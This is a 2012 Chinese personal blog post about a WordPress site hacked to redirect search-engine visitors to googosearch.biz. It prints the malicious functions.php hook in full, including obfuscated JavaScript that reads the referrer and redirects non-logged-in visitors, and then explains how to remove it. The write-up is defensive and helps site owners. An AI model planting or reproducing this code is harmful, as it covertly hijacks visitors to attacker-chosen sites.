• About
  • 淘宝开店考试答案
  • 新浪微博
  • 腾讯微博
  • RSS
指南者
个人原创性独立博客,记录生活、网络心得体验。
  • 首页
  • 网络心得
  • 博客相关
  • 电脑相关
  • 简单心情
  • 偶尔娱乐
  • 软件程序
  • 手机信息
  • 生活常识
  • 留言本
  • ☆小卖部

热门话题: google qq 下载 中国 人 博客 域名 情感 手机 爱情 百度 网站 Tag

  • 网站跳转到googosearch.biz

    2012-03-05 / 分类:网络心得 / 8 条评论 / 1,155 次阅读

    偶然发现从google搜索指南者博客的另一个域名,打开后博客会被自动跳转到http://googosearch.biz/search.php...这样的搜索请求页面,然后重定向到不同的网站,显然这是被黑客恶意利用了。

    网站被黑客篡改,通常为两种方式:

    一,网站服务器有安全漏洞,被黑客侵入并篡改;

    二,博客安装了来源不明的插件或主题(尤其是网上分享的一些免费破解版本)。

    经查询 googosearch.biz 该网站是个国外的并不怎么知名的搜索引擎,经常用一些歪门邪道的方式获取流量。

    想了想我的博客并没有什么有价值的东西值得黑客入侵,并且我使用的服务器是大型网络公司的安全性一向很好,只能从博客自身源码中找猫腻了,花了一下午的时间,终于功夫不负有心人,找到了问题所在,黑客使用了JavaScript检测并判断访问来源方式,然后将符合条件的重定向到http://googosearch.biz/search.php...

    黑客在我的博客主题函数文件 functions.php 中植入了如下代码,是加密过的:

    add_action('get_footer', 'add_sscounter');
    function add_sscounter(){
    echo '<!--scounter-->';
    if(function_exists('is_user_logged_in')){
    if(time()%2 == 0 && !is_user_logged_in()){
    echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r)
    {e=function
    (c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from
    CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
    (c--)r[e(c)]=k[c]||e(c);k=[function(e){return
    r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.rep
    lace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e
    r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\
    "
    ;4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\
    "
    )!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\
    "
    ?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w
    \"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5
    \"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o
    (\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referre
    r|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substri
    ng|split||||||ea|ht|tp|document|||go|window|location'.split('|'),
    0,{}))</script>"
    ; } } }

    如果您也遇到类似问题,先备份原文件然后删除以上恶意代码即可。黑客通常会使用一些恶意的JavaScript插入到网页的PHP代码中,一般会在页脚前,wordpress程序中的恶意代码通常在 WP-load.php、wp-config.php程序配置文件、主题文件中的 functions.php 模板函数文件,以及/wp-content/plugins/下的插件源码中被发现,因值得注意,并且不要给予写入的权限。

    © 原文地址: http://www.amznz.com/redirects-to-googosearch-biz/
    版权所有!如转载文章,请务必注明以上引用地址,否则请勿转载!




    相关文章

    • Google Analytics打不开解决办法
    • 如何关闭 WordPress
    • Google Adsense你是怎么了!
    • Google Adsense你是怎么了!(续)
    • 剖析Google的前1000项搜寻页面结果
    • PR值的重要性
    • No Update Required
    • 国内访问Google+ 的简单方法
    More Articles About: functions,google,googosearch.biz,javascript,wordpress,跳转,重定向

    ☺ 邮件订阅指南者最新文章

    ♥ 您想建一个跟指南者类似的独立博客吗?
    ✓ 逛累了就来指南者的小卖铺看看珍藏吧!

  • + ev、pv、ac项目管理中简写记忆及计算公式
  • + 极品飞车音乐全集下载
  • + November Was White,December Was Grey
  • + Word插入gif动态图片方法
  • + 免费手机号码归属地接口
  • + Axure IOS/Android素材大全
  • + fonts.googleapis.com加载慢解决办法
  • + MySQL数据库MyISAM转换InnoDB方法
  • + 百度蜘蛛IP(定期更新)
  • + LNMPA图片防盗链方法
  • + No Update Required
  • + 如果我欠了你五块钱,请你告诉我

Comment navigation

← Older Comments
  1. 旭日签证 on 2012年05月15日 at 12:08 下午 said:

    这个问题说的好啊,我也遇到了,今天就遇到了,处理了

Comment navigation

← Older Comments
◑简→繁转换
  • 转换到繁体中文
有趣的东西#

♥ 在这里宣传你的产品?看这里»
公告栏
博客语:忧伤的灵,使骨枯干。
耶稣到底要我们放弃生命中的什么东西?
Mail-QQ
热门阅读
  • 200部经典H-小说打包下载 (1,253,685)
  • 淘宝开店考试答案【最新】 (568,709)
  • 加勒比女海盗(Pirates)1.2合集(中文字幕) DVD下载 (556,877)
  • 东京恋爱模样(SILK LABO)下载 (中文字幕) (373,705)
  • 一张图看出你是用左脑还是右脑 (325,773)
  • 不用登录QQ查看好友资料 (178,083)
  • LinkedIn 是什么? (159,641)
  • 教你如何关闭Google的安全搜索功能 (155,644)
  • 手把手教你成为一个牛逼的Blogger (135,569)
  • 泷泽萝拉 四部全集种子下载 (129,738)
  • 致所有来访者(14年2月25日更新) (128,397)
  • 最新搜索引擎收录地址大全 (127,686)
  • 江苏省英语三级四六级查询 (127,268)
  • 局域网中加速启动速度 (123,479)
  • 招商银行一卡通金卡与普卡的区别 (115,737)
  • 查查看你的QQ正常吗 (112,740)
  • Win7、Vista 红警2 局域网联机对战方法 (112,443)
  • 植物大战僵尸-完美中文版下载 (110,824)
推荐
阿里云服务器
随机文章
  • 搜索引擎的“蜘蛛”是什么?:     蜘蛛(Spider)是搜索引擎的......
  • 蝴蝶效应:     在一次浏览互联网时,发现了一个挺......
  • 破解Win7 旗舰版方法:     WIN7已经全面在国内发售,如果......
  • Cohesive tape Management Report:     cohesive tape in......
  • 那又怎么样呢:       那又怎么......
  • 日本,男人,女人:     昨日随手翻看了一本旧杂志,上面有......
  • 2009-观日食:     2009年7月22日百年不遇的日......
  • 详细告诉你什么是竞价:      对于我们做网络的人来说,想学习......
  • fonts.googleapis.com加载慢解决办法: 前段时间帮朋友搭建了一个WordPress博客,由于博客主题中引用了google......
  • 国内访问Google+ 的简单方法:    Google+是Google的社交服务,国内暂时无法访......
  • BOBLOG 修改用户名:     BOBLOG程序搭建的博客不能直......
  • 教你如何卸载Windows 7 : 分享一个卸载Windows 7的简单方法1. 插入 Windows Vista ......
  • 最昂贵胸罩镶数千颗宝石 价值500万美元:     近日,著名巴西超模阿德瑞娜·利玛......
  • 植物大战僵尸-完美中文版下载: 植物大战僵尸算是最近网络上最流行的一款休闲游戏了,同学朋友们都在玩。之前这款全球......
  • PayPal 捐赠按钮设置:     介绍一下 PayPal 的捐赠功......
  • FAT32转NTFS: 在开始菜单里的CMD(vita系统单击右键管理员身份运行)里面打 convert......
  • 两款好用的免费图床程序:     比如在Godaddy注册了几个域......
  • Word打印 你真的会打印吗?:      说到文档的打印,每个人都以为很......
  • Linux重启Tomcat: Linux下重新启动Tomcat,怕忘记,记录下 首先,进入tomcat下......
  • 在线PDF转Word文档-PDFtoWord:     之前一篇文章介绍了PDF转DOC......
最新评论
  • 1: 我是看的抬起来那条腿
  • 赚钱铺: 我的翻译翻译....
  • 赚钱铺: 我没大看懂
  • 及时雨2015: 其实我的58资源网(58zy.top)也是很怕人家盗用图片之类的,因为上面的资源是我很不容易才找到的,免
  • 禹邵文: 243624897@qq.com
  • 听琴等雨: 好
  • 生保博客: 晕死了,我就不会玩这个垃圾游戏!
  • 伟: 种子啊 1436811639@qq.com

Copyright © 2008-2015 指南者 All rights reserved. | 苏ICP备09065647号

Powered by Aliyun & WordPress